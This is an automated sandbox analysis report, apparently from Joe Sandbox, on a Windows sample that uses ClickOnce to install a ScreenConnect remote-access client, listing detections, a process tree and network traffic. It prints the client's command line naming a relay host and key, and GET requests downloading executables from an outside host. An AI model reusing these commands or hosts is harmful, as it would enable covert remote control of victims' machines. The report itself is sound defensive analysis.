Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe

Overview

General Information

Sample name:SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
Analysis ID:1638477
MD5:bfaaad29d18f516511ec1741e1a091db
SHA1:39e2258863f4e1035568a16eec5def14cb602986
SHA256:b609603b40e7eb6d2dfdea9ea187eb82c1a7b55c85965f694548dd6cef36e9f5
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

ScreenConnect Tool
Score:54
Range:0 - 100
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Joe Sandbox ML detected suspicious sample
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe" MD5: BFAAAD29D18F516511EC1741E1A091DB)
    • dfsvc.exe (PID: 7148 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 6376 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe" MD5: AFA993C978BC52D51E8AF08A02892B4E)
        • ScreenConnect.ClientService.exe (PID: 6924 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1" MD5: D3E628C507DC331BAB3DE1178088C978)
          • WerFault.exe (PID: 7144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.1766358365.000001BCA486A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000008.00000002.1325286877.000000000256A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 7148JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6376JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                8.0.ScreenConnect.WindowsClient.exe.2a0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 49684, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7148, Protocol: tcp, SourceIp: 104.21.72.99, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1", ParentImage: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe, ParentProcessId: 6924, ParentProcessName: ScreenConnect.ClientService.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312, ProcessId: 7144, ProcessName: WerFault.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeVirustotal: Detection: 16%Perma Link
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeReversingLabs: Detection: 26%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.0% probability
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_003A1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to behavior

                  Compliance

                  barindex
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Uses 32bit PE files
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 104.21.72.99:443 -> 192.168.2.9:49684 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb3 source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.000000000134A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb a source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: ScreenConnect.Core.pdbJt source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Windows.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdbH source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb4 source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Windows.pdbH source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Core.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B62000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4788000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325166034.0000000002410000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289094143.0000000005582000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000009.00000000.1255423787.00000000009BD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: \??\C:\Windows\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nXC:\Windows\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287827656.0000000001158000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: nect.Core.pdbpdk source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\ScreenConnect.ClientService.pdb{ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: mscorlib.pdbP source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: e.pdbh source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: reenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45D8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325035100.00000000023D2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb= source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdbSystem.ni.dllSystem.Core.dll source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: n0C:\Windows\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbta source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: @o.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4784000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4D29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B5E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289418244.00000000056A2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: %%.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbe source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb\ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B66000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA478C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289884811.0000000005CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: ?oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.pdb4 source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45D8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325035100.00000000023D2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: Core.pdb/ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A4B9B FindFirstFileExA,0_2_003A4B9B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.9:49714 -> 62.182.86.171:8880
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i= HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
